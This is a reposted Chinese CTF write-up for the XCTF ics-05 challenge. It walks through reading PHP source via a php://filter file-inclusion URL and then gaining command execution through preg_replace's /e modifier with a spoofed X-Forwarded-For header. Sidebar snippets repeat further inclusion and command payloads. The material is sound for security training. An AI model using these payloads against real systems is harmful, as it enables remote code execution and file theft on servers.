[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)

最新推荐文章于 2024-09-21 19:00:07 发布
最新推荐文章于 2024-09-21 19:00:07 发布
阅读量845 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/-mo-/p/11572416.html
版权

原作者:admin

[原理]
文件包含读源码、x-forwarded-for

preg_replace 函数执行一个正则表达式的搜索和替换,preg_replce正则表达式部分包含e参数的时候,进行替换的部分会被执行。

[目的]
掌握正则表达式、伪协议读取源码

[环境]
windows

[工具]
firefox、burp

[步骤]
1.进入云平台设备维护中心页面,利用php伪协议读取源码。

http://111.198.29.45:44740/index.php?page=php://filter/convert.base64-encode/resource=index.php

2.将得到的源码进行base64解密处理,获取到index.php的源码,在121行可以发现后门,如图所示。

1561366-20190923145832141-871038246.png

3.对此段代码进行审计,可以发现需要将X_FORWARDED_FOR设置为127.0.0.1,并且用get方式传递三个参数传递给preg_replace函数。

这里介绍一下preg_replace函数:

1561366-20190923150059486-299241198.png

其实就是PHP里的正则表达式,这里可以用/(.*)/e,preg_replace函数可以进行代码执行的:

1561366-20190925111134869-1178487910.png

不过还要注意一点:
1561366-20190925111224550-1796231450.png

4.使用burp修改http请求头参数,添加X_FORWARDED_FOR,将url设置为

/index.php?pat=/(.*)/e&rep=system('ls')&sub=aa 可以查看文件列表,如图所示。

1561366-20190923145842291-635491969.png

5.将url设置为 /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir')&sub=aa 查看s3chahahaDir文件夹,发现flag文件夹。

6.将url设置为 /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir/flag')&sub=aa 查看flag文件夹,发现flag.php文件。

7.将url设置为 /index.php?pat=/(.*)/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=aa 查看flag,如图所示。

1561366-20190923145853744-1097861810.png

转载于:https://www.cnblogs.com/-mo-/p/11572416.html

baguangman5501
关注
CTF-HTTP-PHP封装协议上传木马及远程命令执行
07-31
CTF-HTTP_PHP封装协议上传木马及远程命令执行
攻防世界ics-05
whisper_ZH的博客
10-06 1212
知识点: php伪协议php://filter/convert.base64-encode/resource=xx.php preg_replace()函数漏洞 preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) /e 修正符使 pre...
CTF文件包含篇 与 php文件包含
2301_81556781的博客
07-13 896
phpMyAdmin是开源的MYSQL数据库管理工具 4.8.0~4.8.1index.php界面存在文件包含功能,代码分析进行绕过可实现漏洞利用。
ctf中常见php特性_php特性 ctf
最新发布
2401_87299389的博客
09-21 787
然而,应用程序在处理更改请求时,未验证请求的来源。31. DOM-based XSS:攻击者利用客户端脚本动态修改页面的DOM结构,将恶意脚本插入到页面中,当其他用户访问受影响的页面时,恶意脚本会在他们的浏览器中执行。30. 反射型XSS:攻击者将恶意脚本作为参数注入到受影响的URL中,当用户点击包含恶意脚本的URL时,恶意脚本会从URL中获取并在用户的浏览器中执行。29. 存储型XSS:攻击者将恶意脚本存储在服务器上,当其他用户访问受影响的页面时,恶意脚本会从服务器加载并在用户的浏览器中执行
文件包含(CTF)
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
攻防_漏洞_文件包含_文件包含漏洞详解
redglare的博客
10-22 4165
文件包含漏洞详解
CTF-文件包含(持续更新)
m0_74317362的博客
07-28 1669
任意文件包含漏洞处理方法和实例
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
Hackzone-tunisia-CTF:网站 CTF php + mysql + bootstrap
06-02
2. 文件包含漏洞:检查是否存在可能导致恶意代码执行的不受限制的文件包含函数。 3. 变量和作用域:理解如何正确地声明和使用变量,避免潜在的安全问题。 4. 错误报告和日志:学会如何配置错误报告级别以减少敏感...
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
文件包含漏洞汇总-黑客/渗透测试/CTF通用
08-09
适用于文件包含漏洞初学者去进一步了解漏洞的利用,总结前人的经验
CTF-文件包含学习
weixin_44770698的博客
05-30 2303
CTFSHOW WEB-17 通过请求包查看到服务器为nginx,然后尝试查看一下/etc/passwd文件。 访问成功说明可以访问内网文件,然后尝试读取日志文件中的信息。nginx的日志文件为/var/log/nginx/access.log 发现日志文件中记录了UA,所以在数据包中写入系统执行命令,所以当我们在UA中写入系统执行命令的时候,再去包含,会当做php执行。 发现存在着indes.php 和36d.php两个文件,查看36d.php文件中的内容。 WEB-18
ctf文件包含漏洞(一)
wlllllianqing的博客
10-06 2318
文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞 相关函数: include() include_once() require() require_once() (未完持续…) ...
文件包含漏洞 基础
weixin_50464560的博客
03-21 1042
CTF文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据allow_...
CTF文件包含
qq_45086218的博客
02-28 3305
文章目录php伪协议data伪协议日志文件session文件竞争死亡绕过base64编码绕过 本文以ctf.show网站题目为例,总结ctf中的文件包含漏洞 php伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php data伪协议 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxh
文件包含ctf
qq_42812036的博客
10-14 2873
文件包含定义危险函数ctf文件包含PHP伪协议php://inputphp://filterdata://phar://zip://常见的敏感文件Windows 服务器敏感文件linux 服务器敏感文件 定义 在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外恩德文件,导致意外的文件泄露甚至恶意代码的注入。 严格来说文件包含算是代码注入的一种 危险函数 in...
CTF之web学习记录 -- 文件包含
热门推荐
lifanxin的博客
05-11 1万+
文件包含概述常见文件包含函数和原理本地文件包含远程文件包含总结 概述   后端编程人员一般会把重复使用的函数写到单个文件中,需要使用时再直接调用此文件即可,因此该过程也就被称为文件包含文件包含的存在使得开发变得更加灵活和方便,但同时也带了安全问题,导致客户端可以远程调用文件,造成文件包含漏洞。这个漏洞在php中十分常见,其他语言也有。 常见文件包含函数和原理 # php include() // 执行到include时才包含文件,找不到文件产生警告,脚本继续执行 require() // 程序运行就
ctf 文件包含总结
njqfb的博客
06-04 1681
php伪协议 文件包含用到伪协议的情况挺多 php://input php://input是个可以访问请求的原始数据的只读流,可以理解为读取到的POST上传的数据 当协议当作文件打开时,POST上传的内容相当于文件内容,enctype="multipart/form-data" 的时候 php://input 是无效的 利用: 使用php://input协议并POST要执行代码 绕过file_get_contents函数进行的文件内容检测,比如函数打开一个文件,并验证文件内容是否为xxx,此时可以用php
CTFHUB RCE——文件包含
winofkill的博客
12-11 6642
1.文件包含 首先我们开启题目 看到的是一大串代码 我们仔细看一下php代码,重点是 if(!strpos($_GET["file"],"flag")){ include$_GET["file"]; 这里有一个strpos(string,find,start)函数 意思在string字符串中找find的位置,start是查找的开始位置 那么这句代码的意思就是如果file中没有flag字符串就执行下面的include$_GET["file"] 否则...
PHP伪协议文件包含漏洞分析 - Zad的博客园实战
PHP文件包含漏洞通常发生在代码中使用了类似`include`或`require`等函数,它们可以动态地加载和执行文件。当这些函数的参数来自不受信任的源,比如用户输入时,攻击者可能通过构造特殊的输入来尝试包含服务器上的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值